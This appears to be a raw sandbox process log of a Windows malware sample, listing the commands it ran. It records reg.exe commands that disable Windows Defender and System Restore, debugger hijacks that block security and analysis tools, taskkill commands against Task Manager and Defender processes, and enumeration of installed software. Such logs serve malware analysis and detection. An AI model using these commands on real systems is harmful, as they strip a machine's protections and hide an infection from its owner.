C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1640
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1648
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:744
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1556
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1436
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1960
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:848
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:276
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1076
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1948
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:332
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:924
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1620
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1940
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:972
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2036
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:956
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1044
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:924
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:684
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1076
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1924
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:796
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1708
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:276
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1488
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:432
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:524
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1232
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:276
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:396
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1084
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1932
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1480
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:1464
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:432
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:276
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:536
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:1140
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1068
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1488
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1124
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1944
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1932
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:932
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:616
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:276
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1468
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1964
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1736
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1940
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:396
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:1900
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1944
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:1248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1648
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:432
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1204
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:268
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1736
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1140
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1984
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1196
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1176
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1072
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1428
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:2032
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1952
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:268
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1708
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:616
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1988
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1248
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:756
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1224
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1076
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1996
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1232
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1736
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:268
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1140
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:616
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1196
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1640
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1068
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:560
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1988
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:528
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:560
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1736
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1952
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:756
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1404
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:324
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1988
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:2016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:560
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
